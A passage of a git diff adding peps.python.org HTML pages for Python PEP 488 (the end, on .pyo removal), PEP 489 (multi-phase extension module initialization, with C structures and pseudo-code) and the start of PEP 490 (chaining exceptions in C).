The debug_override parameter will be deprecated. A False +value will be equivalent to optimization=1 while a True +value will represent optimization='' (a None argument will +continue to mean the same as for optimization). A +deprecation warning will be raised when debug_override is given a +value other than None, but there are no plans for the complete +removal of the parameter at this time (but removal will be no later +than Python 4).
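The described equivalence can be sketched as follows (a hypothetical helper, not the actual implementation):

def _resolve_optimization(debug_override=None, optimization=None):
    # Map the deprecated debug_override flag onto the new parameter.
    if debug_override is not None:
        # True selects non-optimized bytecode (no opt- tag in the name);
        # False selects level-1 optimized bytecode.
        optimization = '' if debug_override else 1
    return optimization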

+

The various module attributes for importlib.machinery which relate to +bytecode file suffixes will be updated [7]. The +DEBUG_BYTECODE_SUFFIXES and OPTIMIZED_BYTECODE_SUFFIXES will +both be documented as deprecated and set to the same value as +BYTECODE_SUFFIXES (removal of DEBUG_BYTECODE_SUFFIXES and +OPTIMIZED_BYTECODE_SUFFIXES is not currently planned, but will be +not later than Python 4).

+

All various finders and loaders will also be updated as necessary, but updating the previously mentioned parts of importlib should be all that is required.

+
+
+

Rest of the standard library

+

The various functions exposed by the py_compile and compileall modules will be updated as necessary to make sure they follow the new bytecode file name semantics [6], [1]. The CLI for the compileall module will not be directly affected (the -b flag will be implicit as it will no longer generate .pyo files when -O is specified).

+
+
+
+

Compatibility Considerations

+

Any code directly manipulating bytecode files from Python 3.2 on +will need to consider the impact of this change on their code (prior +to Python 3.2 – including all of Python 2 – there was no +__pycache__ which already necessitates bifurcating bytecode file +handling support). If code was setting the debug_override +argument to importlib.util.cache_from_source() then care will be +needed if they want the path to a bytecode file with an optimization +level of 2. Otherwise only code not using +importlib.util.cache_from_source() will need updating.

+

As for people who distribute bytecode-only modules (i.e., use a bytecode file instead of a source file), they will have to choose which optimization level they want their bytecode files to be, since distributing a .pyo file with a .pyc file will no longer be of any use. Since people typically distribute bytecode files only for code obfuscation purposes or for smaller distribution size, only having to distribute a single .pyc file should actually be beneficial to these use-cases. And since the magic number for bytecode files changed in Python 3.5 to support PEP 465, there is no need to support pre-existing .pyo files [8].

+
+
+

Rejected Ideas

+
+

Completely dropping optimization levels from CPython

+

Some have suggested that instead of accommodating the various +optimization levels in CPython, we should instead drop them +entirely. The argument is that significant performance gains would +occur from runtime optimizations through something like a JIT and not +through pre-execution bytecode optimizations.

+

This idea is rejected for this PEP as that ignores the fact that +there are people who do find the pre-existing optimization levels for +CPython useful. It also assumes that no other Python interpreter +would find what this PEP proposes useful.

+
+
+

Alternative formatting of the optimization level in the file name

+

Using the “opt-” prefix and placing the optimization level between +the cache tag and file extension is not critical. All options which +have been considered are:

+
    +
  • importlib.cpython-35.opt-1.pyc
  • +
  • importlib.cpython-35.opt1.pyc
  • +
  • importlib.cpython-35.o1.pyc
  • +
  • importlib.cpython-35.O1.pyc
  • +
  • importlib.cpython-35.1.pyc
  • +
  • importlib.cpython-35-O1.pyc
  • +
  • importlib.O1.cpython-35.pyc
  • +
  • importlib.o1.cpython-35.pyc
  • +
  • importlib.1.cpython-35.pyc
  • +
+

These were initially rejected either because they would change the +sort order of bytecode files, possible ambiguity with the cache tag, +or were not self-documenting enough. An informal poll was taken and +people clearly preferred the formatting proposed by the PEP [9]. +Since this topic is non-technical and of personal choice, the issue +is considered solved.

+
+
+

Embedding the optimization level in the bytecode metadata

+

Some have suggested that rather than embedding the optimization level +of bytecode in the file name that it be included in the file’s +metadata instead. This would mean every interpreter had a single copy +of bytecode at any time. Changing the optimization level would thus +require rewriting the bytecode, but there would also only be a single +file to care about.

+

This has been rejected due to the fact that Python is often installed as a root-level application, and thus modifying the bytecode files for modules in the standard library is not always possible. In this situation integrators would need to guess at what a reasonable optimization level was for users in any/all situations. By allowing multiple optimization levels to co-exist simultaneously, it frees integrators from having to guess what users want and allows users to utilize the optimization level they want.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0488.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0489/index.html b/pep-0489/index.html new file mode 100644 index 00000000000..227e66fd0f0 --- /dev/null +++ b/pep-0489/index.html @@ -0,0 +1,951 @@ PEP 489 – Multi-phase extension module initialization | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 489 – Multi-phase extension module initialization

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>, +Stefan Behnel <stefan_ml at behnel.de>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Import-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Aug-2013
+
Python-Version:
+
3.5
+
Post-History:
+
23-Aug-2013, 20-Feb-2015, 16-Apr-2015, 07-May-2015, 18-May-2015
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a redesign of the way in which built-in and extension modules +interact with the import machinery. This was last revised for Python 3.0 in PEP +3121, but did not solve all problems at the time. The goal is to solve +import-related problems by bringing extension modules closer to the way Python +modules behave; specifically to hook into the ModuleSpec-based loading +mechanism introduced in PEP 451.

+

This proposal draws inspiration from PyType_Spec of PEP 384 to allow extension +authors to only define features they need, and to allow future additions +to extension module declarations.

+

Extension modules are created in a two-step process, fitting better into the ModuleSpec architecture, with parallels to __new__ and __init__ of classes.

+

Extension modules can safely store arbitrary C-level per-module state in +the module that is covered by normal garbage collection and supports +reloading and sub-interpreters. +Extension authors are encouraged to take these issues into account +when using the new API.

+

The proposal also allows extension modules with non-ASCII names.

+

Not all problems tackled in PEP 3121 are solved in this proposal. +In particular, problems with run-time module lookup (PyState_FindModule) +are left to a future PEP.

+
+
+

Motivation

+

Python modules and extension modules are not set up in the same way. For Python modules, the module object is created and set up first, then the module code is executed (PEP 302). A ModuleSpec object (PEP 451) is used to hold information about the module, and is passed to the relevant hooks.

+

For extensions (i.e. shared libraries) and built-in modules, the module +init function is executed straight away and does both the creation and +initialization. The initialization function is not passed the ModuleSpec, +or any information it contains, such as the __file__ or fully-qualified +name. This hinders relative imports and resource loading.

+

In Py3, the module is also not added to sys.modules before the init function finishes, which means that a (potentially transitive) re-import of the module will really try to re-import it and thus run into an infinite loop when it executes the module init function again. Without access to the fully-qualified module name, it is not trivial to correctly add the module to sys.modules either. This is specifically a problem for Cython-generated modules, for which it’s not uncommon that the module init code has the same level of complexity as that of any ‘regular’ Python module. Also, the lack of __file__ and __name__ information hinders the compilation of “__init__.py” modules, i.e. packages, especially when relative imports are being used at module init time.

+

Furthermore, the majority of currently existing extension modules have problems with sub-interpreter support and/or interpreter reloading, and, while it is possible with the current infrastructure to support these features, it is neither easy nor efficient. Addressing these issues was the goal of PEP 3121, but many extensions, including some in the standard library, took the least-effort approach to porting to Python 3, leaving these issues unresolved. This PEP keeps backwards compatibility, which should reduce pressure and give extension authors adequate time to consider these issues when porting.

+
+
+

The current process

+

Currently, extension and built-in modules export an initialization function +named “PyInit_modulename”, named after the file name of the shared library. +This function is executed by the import machinery and must return a fully +initialized module object. +The function receives no arguments, so it has no way of knowing about its +import context.

+

During its execution, the module init function creates a module object +based on a PyModuleDef object. It then continues to initialize it by adding +attributes to the module dict, creating types, etc.

+

Behind the scenes, the shared library loader keeps a note of the fully qualified module name of the last module that it loaded, and when a module gets created that has a matching name, this global variable is used to determine the fully qualified name of the module object. This is not entirely safe, as it relies on the module init function creating its own module object first, but this assumption usually holds in practice.

+
+
+

The proposal

+

The initialization function (PyInit_modulename) will be allowed to return +a pointer to a PyModuleDef object. The import machinery will be in charge +of constructing the module object, calling hooks provided in the PyModuleDef +in the relevant phases of initialization (as described below).

+

This multi-phase initialization is an additional possibility. Single-phase +initialization, the current practice of returning a fully initialized module +object, will still be accepted, so existing code will work unchanged, +including binary compatibility.

+

The PyModuleDef structure will be changed to contain a list of slots, +similarly to PEP 384’s PyType_Spec for types. +To keep binary compatibility, and avoid needing to introduce a new structure +(which would introduce additional supporting functions and per-module storage), +the currently unused m_reload pointer of PyModuleDef will be changed to +hold the slots. The structures are defined as:

+
typedef struct {
+    int slot;
+    void *value;
+} PyModuleDef_Slot;
+
+typedef struct PyModuleDef {
+    PyModuleDef_Base m_base;
+    const char* m_name;
+    const char* m_doc;
+    Py_ssize_t m_size;
+    PyMethodDef *m_methods;
+    PyModuleDef_Slot *m_slots;  /* changed from `inquiry m_reload;` */
+    traverseproc m_traverse;
+    inquiry m_clear;
+    freefunc m_free;
+} PyModuleDef;
+
+
+

The m_slots member must be either NULL, or point to an array of +PyModuleDef_Slot structures, terminated by a slot with id set to 0 +(i.e. {0, NULL}).

+

To specify a slot, a unique slot ID must be provided. +New Python versions may introduce new slot IDs, but slot IDs will never be +recycled. Slots may get deprecated, but will continue to be supported +throughout Python 3.x.

+

A slot’s value pointer may not be NULL, unless specified otherwise in the +slot’s documentation.

+

The following slots are currently available, and described later:

+
    +
  • Py_mod_create
  • +
  • Py_mod_exec
  • +
+

Unknown slot IDs will cause the import to fail with SystemError.

+

When using multi-phase initialization, the m_name field of PyModuleDef will +not be used during importing; the module name will be taken from the ModuleSpec.

+

Before it is returned from PyInit_*, the PyModuleDef object must be initialized +using the newly added PyModuleDef_Init function. This sets the object type +(which cannot be done statically on certain compilers), refcount, and internal +bookkeeping data (m_index). +For example, an extension module “example” would be exported as:

+
static PyModuleDef example_def = {...}
+
+PyMODINIT_FUNC
+PyInit_example(void)
+{
+    return PyModuleDef_Init(&example_def);
+}
+
+
+

The PyModuleDef object must be available for the lifetime of the module created +from it – usually, it will be declared statically.

+
+

Pseudo-code Overview

+

Here is an overview of how the modified importers will operate. +Details such as logging or handling of errors and invalid states +are left out, and C code is presented with a concise Python-like syntax.

+

The framework that calls the importers is explained in +PEP 451.

+

importlib/_bootstrap.py:

+
+
class BuiltinImporter:
+    def create_module(self, spec):
+        module = _imp.create_builtin(spec)
+
+    def exec_module(self, module):
+        _imp.exec_dynamic(module)
+
+    def load_module(self, name):
+        # use a backwards compatibility shim
+        _load_module_shim(self, name)
+
+
+
+

importlib/_bootstrap_external.py:

+
+
class ExtensionFileLoader:
+    def create_module(self, spec):
+        module = _imp.create_dynamic(spec)
+
+    def exec_module(self, module):
+        _imp.exec_dynamic(module)
+
+    def load_module(self, name):
+        # use a backwards compatibility shim
+        _load_module_shim(self, name)
+
+
+
+

Python/import.c (the _imp module):

+
+
def create_dynamic(spec):
+    name = spec.name
+    path = spec.origin
+
+    # Find an already loaded module that used single-phase init.
+    # For multi-phase initialization, mod is NULL, so a new module
+    # is always created.
+    mod = _PyImport_FindExtensionObject(name, name)
+    if mod:
+        return mod
+
+    return _PyImport_LoadDynamicModuleWithSpec(spec)
+
+def exec_dynamic(module):
+    if not isinstance(module, types.ModuleType):
+        # non-modules are skipped -- PyModule_GetDef fails on them
+        return
+
+    def = PyModule_GetDef(module)
+    state = PyModule_GetState(module)
+    if state is NULL:
+        PyModule_ExecDef(module, def)
+
+def create_builtin(spec):
+    name = spec.name
+
+    # Find an already loaded module that used single-phase init.
+    # For multi-phase initialization, mod is NULL, so a new module
+    # is always created.
+    mod = _PyImport_FindExtensionObject(name, name)
+    if mod:
+        return mod
+
+    for initname, initfunc in PyImport_Inittab:
+        if name == initname:
+            m = initfunc()
+            if isinstance(m, PyModuleDef):
+                def = m
+                return PyModule_FromDefAndSpec(def, spec)
+            else:
+                # fall back to single-phase initialization
+                module = m
+                _PyImport_FixupExtensionObject(module, name, name)
+                return module
+
+
+
+

Python/importdl.c:

+
+
def _PyImport_LoadDynamicModuleWithSpec(spec):
+    path = spec.origin
+    package, dot, name = spec.name.rpartition('.')
+
+    # see the "Non-ASCII module names" section for export_hook_name
+    hook_name = export_hook_name(name)
+
+    # call platform-specific function for loading exported function
+    # from shared library
+    exportfunc = _find_shared_funcptr(hook_name, path)
+
+    m = exportfunc()
+    if isinstance(m, PyModuleDef):
+        def = m
+        return PyModule_FromDefAndSpec(def, spec)
+
+    module = m
+
+    # fall back to single-phase initialization
+    ....
+
+
+
+

Objects/moduleobject.c:

+
+
def PyModule_FromDefAndSpec(def, spec):
+    name = spec.name
+    create = None
+    for slot, value in def.m_slots:
+        if slot == Py_mod_create:
+            create = value
+    if create:
+        m = create(spec, def)
+    else:
+        m = PyModule_New(name)
+
+    if isinstance(m, types.ModuleType):
+        m.md_state = None
+        m.md_def = def
+
+    if def.m_methods:
+        PyModule_AddFunctions(m, def.m_methods)
+    if def.m_doc:
+        PyModule_SetDocString(m, def.m_doc)
+
+def PyModule_ExecDef(module, def):
+    if isinstance(module, types.module_type):
+        if module.md_state is NULL:
+            # allocate a block of zeroed-out memory
+            module.md_state = _alloc(module.md_size)
+
+    if def.m_slots is NULL:
+        return
+
+    for slot, value in def.m_slots:
+        if slot == Py_mod_exec:
+            value(module)
+
+
+
+
+
+

Module Creation Phase

+

Creation of the module object – that is, the implementation of +ExecutionLoader.create_module – is governed by the Py_mod_create slot.

+
+

The Py_mod_create slot

+

The Py_mod_create slot is used to support custom module subclasses. +The value pointer must point to a function with the following signature:

+
PyObject* (*PyModuleCreateFunction)(PyObject *spec, PyModuleDef *def)
+
+
+

The function receives a ModuleSpec instance, as defined in PEP 451, +and the PyModuleDef structure. +It should return a new module object, or set an error +and return NULL.

+

This function is not responsible for setting import-related attributes +specified in PEP 451 (such as __name__ or +__loader__) on the new module.

+

There is no requirement for the returned object to be an instance of +types.ModuleType. Any type can be used, as long as it supports setting and +getting attributes, including at least the import-related attributes. +However, only ModuleType instances support module-specific functionality +such as per-module state and processing of execution slots. +If something other than a ModuleType subclass is returned, no execution slots +may be defined; if any are, a SystemError is raised.

+

Note that when this function is called, the module’s entry in sys.modules is not populated yet. Attempting to import the same module again (possibly transitively) may lead to an infinite loop. Extension authors are advised to keep Py_mod_create minimal, and in particular to not call user code from it.

+

Multiple Py_mod_create slots may not be specified. If they are, import +will fail with SystemError.

+

If Py_mod_create is not specified, the import machinery will create a normal +module object using PyModule_New. The name is taken from spec.

+
+
+

Post-creation steps

+

If the Py_mod_create function returns an instance of types.ModuleType +or a subclass (or if a Py_mod_create slot is not present), the import +machinery will associate the PyModuleDef with the module. +This also makes the PyModuleDef accessible to execution phase, the +PyModule_GetDef function, and garbage collection routines (traverse, +clear, free).

+

If the Py_mod_create function does not return a module subclass, then m_size +must be 0, and m_traverse, m_clear and m_free must all be NULL. +Otherwise, SystemError is raised.

+

Additionally, initial attributes specified in the PyModuleDef are set on the +module object, regardless of its type:

+
    +
  • The docstring is set from m_doc, if non-NULL.
  • +
  • The module’s functions are initialized from m_methods, if any.
  • +
+
+
+
+

Module Execution Phase

+

Module execution – that is, the implementation of +ExecutionLoader.exec_module – is governed by “execution slots”. +This PEP only adds one, Py_mod_exec, but others may be added in the future.

+

The execution phase is done on the PyModuleDef associated with the module +object. For objects that are not a subclass of PyModule_Type (for which +PyModule_GetDef would fail), the execution phase is skipped.

+

Execution slots may be specified multiple times, and are processed in the order +they appear in the slots array. +When using the default import machinery, they are processed after +import-related attributes specified in PEP 451 +(such as __name__ or __loader__) are set and the module is added +to sys.modules.

+
+

Pre-Execution steps

+

Before processing the execution slots, per-module state is allocated for the +module. From this point on, per-module state is accessible through +PyModule_GetState.

+
+
+

The Py_mod_exec slot

+

The entry in this slot must point to a function with the following signature:

+
int (*PyModuleExecFunction)(PyObject* module)
+
+
+

It will be called to initialize a module. Usually, this amounts to +setting the module’s initial attributes. +The “module” argument receives the module object to initialize.

+

The function must return 0 on success, or, on error, set an exception and +return -1.

+

If PyModuleExec replaces the module’s entry in sys.modules, the new object +will be used and returned by importlib machinery after all execution slots +are processed. This is a feature of the import machinery itself. +The slots themselves are all processed using the module returned from the +creation phase; sys.modules is not consulted during the execution phase. +(Note that for extension modules, implementing Py_mod_create is usually +a better solution for using custom module objects.)

+
+
+
+

Legacy Init

+

The backwards-compatible single-phase initialization continues to be supported. +In this scheme, the PyInit function returns a fully initialized module rather +than a PyModuleDef object. +In this case, the PyInit hook implements the creation phase, and the execution +phase is a no-op.

+

Modules that need to work unchanged on older versions of Python should stick to +single-phase initialization, because the benefits it brings can’t be +back-ported. +Here is an example of a module that supports multi-phase initialization, +and falls back to single-phase when compiled for an older version of CPython. +It is included mainly as an illustration of the changes needed to enable +multi-phase init:

+
#include <Python.h>
+
+static int spam_exec(PyObject *module) {
+    PyModule_AddStringConstant(module, "food", "spam");
+    return 0;
+}
+
+#ifdef Py_mod_exec
+static PyModuleDef_Slot spam_slots[] = {
+    {Py_mod_exec, spam_exec},
+    {0, NULL}
+};
+#endif
+
+static PyModuleDef spam_def = {
+    PyModuleDef_HEAD_INIT,                      /* m_base */
+    "spam",                                     /* m_name */
+    PyDoc_STR("Utilities for cooking spam"),    /* m_doc */
+    0,                                          /* m_size */
+    NULL,                                       /* m_methods */
+#ifdef Py_mod_exec
+    spam_slots,                                 /* m_slots */
+#else
+    NULL,
+#endif
+    NULL,                                       /* m_traverse */
+    NULL,                                       /* m_clear */
+    NULL,                                       /* m_free */
+};
+
+PyMODINIT_FUNC
+PyInit_spam(void) {
+#ifdef Py_mod_exec
+    return PyModuleDef_Init(&spam_def);
+#else
+    PyObject *module;
+    module = PyModule_Create(&spam_def);
+    if (module == NULL) return NULL;
+    if (spam_exec(module) != 0) {
+        Py_DECREF(module);
+        return NULL;
+    }
+    return module;
+#endif
+}
+
+
+
+
+

Built-In modules

+

Any extension module can be used as a built-in module by linking it into +the executable, and including it in the inittab (either at runtime with +PyImport_AppendInittab, or at configuration time, using tools like freeze).

+

To keep this possibility, all changes to extension module loading introduced +in this PEP will also apply to built-in modules. +The only exception is non-ASCII module names, explained below.

+
+
+

Subinterpreters and Interpreter Reloading

+

Extensions using the new initialization scheme are expected to support +subinterpreters and multiple Py_Initialize/Py_Finalize cycles correctly, +avoiding the issues mentioned in Python documentation [6]. +The mechanism is designed to make this easy, but care is still required +on the part of the extension author. +No user-defined functions, methods, or instances may leak to different +interpreters. +To achieve this, all module-level state should be kept in either the module +dict, or in the module object’s storage reachable by PyModule_GetState. +A simple rule of thumb is: Do not define any static data, except built-in types +with no mutable or user-settable class attributes.

+
+
+

Functions incompatible with multi-phase initialization

+

The PyModule_Create function will fail when used on a PyModuleDef structure +with a non-NULL m_slots pointer. +The function doesn’t have access to the ModuleSpec object necessary for +multi-phase initialization.

+

The PyState_FindModule function will return NULL, and PyState_AddModule +and PyState_RemoveModule will also fail on modules with non-NULL m_slots. +PyState registration is disabled because multiple module objects may be created +from the same PyModuleDef.

+
+
+

Module state and C-level callbacks

+

Due to the unavailability of PyState_FindModule, any function that needs access +to module-level state (including functions, classes or exceptions defined at +the module level) must receive a reference to the module object (or the +particular object it needs), either directly or indirectly. +This is currently difficult in two situations:

+
    +
  • Methods of classes, which receive a reference to the class, but not to +the class’s module
  • +
  • Libraries with C-level callbacks, unless the callbacks can receive custom +data set at callback registration
  • +
+

Fixing these cases is outside of the scope of this PEP, but will be needed for +the new mechanism to be useful to all modules. Proper fixes have been discussed +on the import-sig mailing list [5].

+

As a rule of thumb, modules that rely on PyState_FindModule are, at the moment, +not good candidates for porting to the new mechanism.

+
+
+

New Functions

+

A new function and macro implementing the module creation phase will be added. +These are similar to PyModule_Create and PyModule_Create2, except they +take an additional ModuleSpec argument, and handle module definitions with +non-NULL slots:

+
PyObject * PyModule_FromDefAndSpec(PyModuleDef *def, PyObject *spec)
+PyObject * PyModule_FromDefAndSpec2(PyModuleDef *def, PyObject *spec,
+                                    int module_api_version)
+
+
+

A new function implementing the module execution phase will be added. +This allocates per-module state (if not allocated already), and always +processes execution slots. The import machinery calls this method when +a module is executed, unless the module is being reloaded:

+
PyAPI_FUNC(int) PyModule_ExecDef(PyObject *module, PyModuleDef *def)
+
+
+

Another function will be introduced to initialize a PyModuleDef object. +This idempotent function fills in the type, refcount, and module index. +It returns its argument cast to PyObject*, so it can be returned directly +from a PyInit function:

+
PyObject * PyModuleDef_Init(PyModuleDef *);
+
+
+

Additionally, two helpers will be added for setting the docstring and +methods on a module:

+
int PyModule_SetDocString(PyObject *, const char *)
+int PyModule_AddFunctions(PyObject *, PyMethodDef *)
+
+
+
+
+

Export Hook Name

+

As portable C identifiers are limited to ASCII, module names +must be encoded to form the PyInit hook name.

+

For ASCII module names, the import hook is named +PyInit_<modulename>, where <modulename> is the name of the module.

+

For module names containing non-ASCII characters, the import hook is named +PyInitU_<encodedname>, where the name is encoded using CPython’s +“punycode” encoding (Punycode with a lowercase suffix), +with hyphens (“-”) replaced by underscores (“_”).

+

In Python:

+
def export_hook_name(name):
+    try:
+        suffix = b'_' + name.encode('ascii')
+    except UnicodeEncodeError:
+        suffix = b'U_' + name.encode('punycode').replace(b'-', b'_')
+    return b'PyInit' + suffix
+
+
+

Examples:

+ + + + + + + + + + + + + + + + + +
Module nameInit hook name
spamPyInit_spam
lančmítPyInitU_lanmt_2sa6t
スパムPyInitU_zck5b2b
+

For modules with non-ASCII names, single-phase initialization is not supported.

+

In the initial implementation of this PEP, built-in modules with non-ASCII +names will not be supported.

+
+
+

Module Reloading

+

Reloading an extension module using importlib.reload() will continue to +have no effect, except re-setting import-related attributes.

+

Due to limitations in shared library loading (both dlopen on POSIX and LoadLibraryEx on Windows), it is not generally possible to load a modified library after it has changed on disk.

+

Use cases for reloading other than trying out a new version of the module +are too rare to require all module authors to keep reloading in mind. +If reload-like functionality is needed, authors can export a dedicated +function for it.

+
+
+

Multiple modules in one library

+

To support multiple Python modules in one shared library, the library can +export additional PyInit* symbols besides the one that corresponds +to the library’s filename.

+

Note that this mechanism can currently only be used to load extra modules, +but not to find them. (This is a limitation of the loader mechanism, +which this PEP does not try to modify.) +To work around the lack of a suitable finder, code like the following +can be used:

+
import importlib.machinery
+import importlib.util
+loader = importlib.machinery.ExtensionFileLoader(name, path)
+spec = importlib.util.spec_from_loader(name, loader)
+module = importlib.util.module_from_spec(spec)
+loader.exec_module(module)
+return module
+
+
+

On platforms that support symbolic links, these may be used to install one +library under multiple names, exposing all exported modules to normal +import machinery.

+
+
+

Testing and initial implementations

+

For testing, a new built-in module _testmultiphase will be created. +The library will export several additional modules using the mechanism +described in “Multiple modules in one library”.

+

The _testcapi module will be unchanged, and will use single-phase +initialization indefinitely (or until it is no longer supported).

+

The array and xx* modules will be converted to use multi-phase +initialization as part of the initial implementation.

+
+
+
+

Summary of API Changes and Additions

+

New functions:

+
    +
  • PyModule_FromDefAndSpec (macro)
  • +
  • PyModule_FromDefAndSpec2
  • +
  • PyModule_ExecDef
  • +
  • PyModule_SetDocString
  • +
  • PyModule_AddFunctions
  • +
  • PyModuleDef_Init
  • +
+

New macros:

+
    +
  • Py_mod_create
  • +
  • Py_mod_exec
  • +
+

New types:

+
    +
  • PyModuleDef_Type will be exposed
  • +
+

New structures:

+
    +
  • PyModuleDef_Slot
  • +
+

Other changes:

+

PyModuleDef.m_reload changes to PyModuleDef.m_slots.

+

BuiltinImporter and ExtensionFileLoader will now implement +create_module and exec_module.

+

The internal _imp module will have backwards incompatible changes: +create_builtin, create_dynamic, and exec_dynamic will be added; +init_builtin, load_dynamic will be removed.

+

The undocumented functions imp.load_dynamic and imp.init_builtin will +be replaced by backwards-compatible shims.

+
+

Backwards Compatibility

+

Existing modules will continue to be source- and binary-compatible with new +versions of Python. +Modules that use multi-phase initialization will not be compatible with +versions of Python that do not implement this PEP.

+

The functions init_builtin and load_dynamic will be removed from +the _imp module (but not from the imp module).

+

All changed loaders (BuiltinImporter and ExtensionFileLoader) will +remain backwards-compatible; the load_module method will be replaced by +a shim.

+

Internal functions of Python/import.c and Python/importdl.c will be removed. +(Specifically, these are _PyImport_GetDynLoadFunc, +_PyImport_GetDynLoadWindows, and _PyImport_LoadDynamicModule.)

+
+
+
+

Possible Future Extensions

+

The slots mechanism, inspired by PyType_Slot from PEP 384, +allows later extensions.

+

Some extension modules export many constants; for example _ssl has a long list of calls in the form:

+
PyModule_AddIntConstant(m, "SSL_ERROR_ZERO_RETURN",
+                        PY_SSL_ERROR_ZERO_RETURN);
+
+
+

Converting this to a declarative list, similar to PyMethodDef, +would reduce boilerplate, and provide free error-checking which +is often missing.

+

String constants and types can be handled similarly. +(Note that non-default bases for types cannot be portably specified +statically; this case would need a Py_mod_exec function that runs +before the slots are added. The free error-checking would still be +beneficial, though.)

+

Another possibility is providing a “main” function that would be run +when the module is given to Python’s -m switch. +For this to work, the runpy module will need to be modified to take +advantage of ModuleSpec-based loading introduced in PEP 451. +Also, it will be necessary to add a mechanism for setting up a module +according to slots it wasn’t originally defined with.

+
+
+

Implementation

+

A work-in-progress implementation is available in a GitHub repository [3]; a patchset is at [4].

+
+
+

Previous Approaches

+

Stefan Behnel’s initial proto-PEP [1] +had a “PyInit_modulename” hook that would create a module class, +whose __init__ would be then called to create the module. +This proposal did not correspond to the (then nonexistent) PEP 451, +where module creation and initialization is broken into distinct steps. +It also did not support loading an extension into pre-existing module objects.

+

Alyssa (Nick) Coghlan proposed “Create” and “Exec” hooks, and wrote a prototype +implementation [2]. +At this time PEP 451 was still not implemented, so the prototype +does not use ModuleSpec.

+

The original version of this PEP used Create and Exec hooks, and allowed +loading into arbitrary pre-constructed objects with Exec hook. +The proposal made extension module initialization closer to how Python modules +are initialized, but it was later recognized that this isn’t an important goal. +The current PEP describes a simpler solution.

+

A further iteration used a “PyModuleExport” hook as an alternative to PyInit, +where PyInit was used for existing scheme, and PyModuleExport for multi-phase. +However, not being able to determine the hook name based on module name +complicated automatic generation of PyImport_Inittab by tools like freeze. +Keeping only the PyInit hook name, even if it’s not entirely appropriate for +exporting a definition, yielded a much simpler solution.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0489.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0490/index.html b/pep-0490/index.html new file mode 100644 index 00000000000..b47580a60f6 --- /dev/null +++ b/pep-0490/index.html @@ -0,0 +1,427 @@ PEP 490 – Chain exceptions at C level | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 490 – Chain exceptions at C level

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
25-Mar-2015
+
Python-Version:
+
3.6
+
+
+
+
Table of Contents +
+
+

Abstract

+

Chain exceptions at C level, as already done at Python level.

+
+
+

Rationale

+

Python 3 introduced a new killer feature: exceptions are chained by +default, PEP 3134.

+

Example:

+
try:
+    raise TypeError("err1")
+except TypeError:
+    raise ValueError("err2")
+
+
+

Output:

+
Traceback (most recent call last):
+  File "test.py", line 2, in <module>
+    raise TypeError("err1")
+TypeError: err1
+
+During handling of the above exception, another exception occurred:
+
+Traceback (most recent call last):
+  File "test.py", line 4, in <module>
+    raise ValueError("err2")
+ValueError: err2
+
+
+

Exceptions are chained by default in Python code, but not in +extensions written in C.

+

A new private _PyErr_ChainExceptions() function was introduced in +Python 3.4.3 and 3.5 to chain exceptions. Currently, it must be called +explicitly to chain exceptions and its usage is not trivial.

+

Example of _PyErr_ChainExceptions() usage from the zipimport +module to chain the previous OSError to a new ZipImportError +exception:

+
PyObject *exc, *val, *tb;
+PyErr_Fetch(&exc, &val, &tb);
+PyErr_Format(ZipImportError, "can't open Zip file: %R", archive);
+_PyErr_ChainExceptions(exc, val, tb);
+
+
+

This PEP proposes to also chain exceptions automatically at C level to +stay consistent and give more information on failures to help +debugging. The previous example becomes simply:

+
PyErr_Format(ZipImportError, "can't open Zip file: %R", archive);
+
+
+
+
+

Proposal

+
+

Modify PyErr_*() functions to chain exceptions

+

Modify C functions raising exceptions of the Python C API to +automatically chain exceptions: modify PyErr_SetString(), +PyErr_Format(), PyErr_SetNone(), etc.

+
+
+

Modify functions to not chain exceptions

+

Keeping the previous exception is not always desirable when the new exception contains the information of the previous exception or even more information, especially when the two exceptions have the same type.

+

Example of a useless exception chain with int(str):

+
TypeError: a bytes-like object is required, not 'type'
+
+During handling of the above exception, another exception occurred:
+
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: int() argument must be a string, a bytes-like object or a number, not 'type'
+
+
+

The new TypeError exception contains more information than the +previous exception. The previous exception should be hidden.

+

The PyErr_Clear() function can be called to clear the current +exception before raising a new exception, to not chain the current +exception with a new exception.
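For comparison, this mirrors the Python-level idiom from PEP 415 (listed in the Appendix), where raise ... from None suppresses the chained context:

try:
    raise TypeError("err1")
except TypeError:
    # "from None" plays the role of PyErr_Clear() here: the new
    # exception is raised without chaining the one being handled.
    raise ValueError("err2") from None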

+
+
+

Modify functions to chain exceptions

+

Some functions save and then restore the current exception. If a new +exception is raised, the exception is currently displayed into +sys.stderr or ignored depending on the function. Some of these +functions should be modified to chain exceptions instead.

+

Examples of functions ignoring the new exception(s):

+
    +
  • ptrace_enter_call(): ignore exception
  • +
  • subprocess_fork_exec(): ignore exception raised by enable_gc()
  • +
  • t_bootstrap() of the _thread module: ignore exception raised +by trying to display the bootstrap function to sys.stderr
  • +
  • PyDict_GetItem(), _PyDict_GetItem_KnownHash(): ignore +exception raised by looking for a key in the dictionary
  • +
  • _PyErr_TrySetFromCause(): ignore exception
  • +
  • PyFrame_LocalsToFast(): ignore exception raised by +dict_to_map()
  • +
  • _PyObject_Dump(): ignore exception. _PyObject_Dump() is used +to debug, to inspect a running process, it should not modify the +Python state.
  • +
  • Py_ReprLeave(): ignore exception “because there is no way to +report them”
  • +
  • type_dealloc(): ignore exception raised by +remove_all_subclasses()
  • +
  • PyObject_ClearWeakRefs(): ignore exception?
  • +
  • call_exc_trace(), call_trace_protected(): ignore exception
  • +
  • remove_importlib_frames(): ignore exception
  • +
  • do_mktuple(), helper used by Py_BuildValue() for example: +ignore exception?
  • +
  • flush_io(): ignore exception
